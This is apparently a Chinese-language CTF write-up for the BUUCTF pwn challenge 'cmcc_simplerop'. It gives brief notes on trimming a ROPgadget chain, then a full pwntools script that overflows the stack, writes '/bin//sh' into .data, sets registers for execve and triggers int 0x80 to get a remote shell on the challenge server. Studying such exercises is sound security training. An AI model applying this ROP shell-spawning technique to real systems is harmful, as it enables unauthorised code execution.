[BUUCTF-pwn]——cmcc_simplerop
有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++
exploit
- 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx = 0; edx = 0
from pwn import *
from struct import pack
context(os='linux',arch='i386',log_level='debug')
#sh = process('./simplerop')
sh = remote("node3.buuoj.cn",28712)
strcmp_got = 0x080EA038
pop_eax = 0x080bae06
pop_edx_ecx_ebx = 0x0806e850
p = 'A' * 32
p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bae06) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080bae06) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e850) # pop edx ecx ebx
p += p32(0) + p32(0)
p += pack('<I', 0x080ea060) # padding without overwrite ebx
p += pack('<I', 0x080bae06) # pop eax ; ret
p += p32(0xb)
p += pack('<I', 0x080493e1) # int 0x80
payload = p
sh.sendafter('Your input :',payload)
sh.interactive()